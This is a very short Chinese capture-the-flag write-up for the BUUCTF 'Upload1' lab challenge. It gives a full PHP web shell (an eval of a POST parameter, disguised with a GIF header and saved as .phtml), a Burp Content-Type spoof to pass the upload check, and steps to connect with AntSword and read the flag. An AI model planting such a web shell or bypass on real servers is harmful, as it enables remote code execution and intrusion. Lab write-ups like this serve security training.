文首,感谢buuctf的平台 文章目录 Web-[极客大挑战 2019] Upload1 Web-[极客大挑战 2019] Upload1 写个shell,shell名she.phtml 内容 GIF98a <script language="php">eval($_POST['cmd']);</script> burp抓包Content-Type: image/jpeg 在upload/目录下,访问页面,蚁剑连接,cat /flag